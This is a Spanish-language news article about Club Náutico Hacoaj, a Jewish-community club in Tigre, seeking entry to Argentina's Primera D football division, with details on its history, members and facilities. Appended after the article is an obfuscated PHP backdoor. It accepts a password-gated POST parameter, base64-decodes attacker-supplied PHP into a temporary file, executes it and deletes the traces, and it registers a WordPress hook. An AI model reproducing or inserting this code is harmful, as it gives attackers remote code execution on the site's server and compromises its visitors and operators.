Náutico Hacoaj busca su inserción en el torneo de Primera D

Foto: Hacoaj Fútbol

El Club Náutico Hacoaj, uno de los clubes más representativos de la comunidad judía argentina, presentó carpeta y solicitud en la AFA para acceder a uno de los lugares en la Primera D.

Aún sin fecha de inicio -será a comienzos de mayo- ni sistema de disputa confirmado, el certamen de Primera D 2021-22 solamente tiene una certeza: se aceptarán nuevos clubes. En principio serían cuatro los cupos para una división que en los últimos años se mostró bastante reacia a aceptar nuevos participantes.

Náutico Hacoaj, con cancha propia en Tigre, intentó hace dos décadas atrás sumarse a la categoría más baja del fútbol de AFA; ante la negativa resolvió inscribirse en la Liga Escobarense de Fútbol. Y así logró clasificaciones a los Torneos Argentino C y B, con la dirección técnica de Jorge Cembal (ex jugador del club y también de Atlanta, Comunicaciones y equipos del exterior y actual DT de la Selección Argentina Senior).

Un rico antecedente del pasado futbolístico de Hacoaj tiene como ejemplo a Daniel Brailovsky, posteriormente jugador de Peñarol, All Boys. Independiente, América de México y Selección Argentina, formado en las inferiores del club ubicado en Tigre.

Náutico Hacoaj tiene 7.600 socios, 21 deportes, cinco sedes (cuatro en Tigre y una en CABA), una cancha habilitada por la Aprevide y figuras del deporte argentino y mundial, como el tenista Diego Peque Schwartzman, integrantes de Las Leonas, remeros olímpicos y títulos nacionales en básquet y vóley.

También cuenta con seis canchas con medidas FIFA, una cancha de sintético, 30 equipos desde divisiones inferiores a Seniors AFA, tres primeras divisiones, y tres equipos de fútbol femenino.

Por tradición en el deporte, en las competencias de la AFA y como referente de la comunidad judía, Hacoaj aspira al lugar en la Primera D. Su incorporación sería también un impacto a nivel mundial porque es uno de los clubes más grandes de la comunidad judía a nivel internacional.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}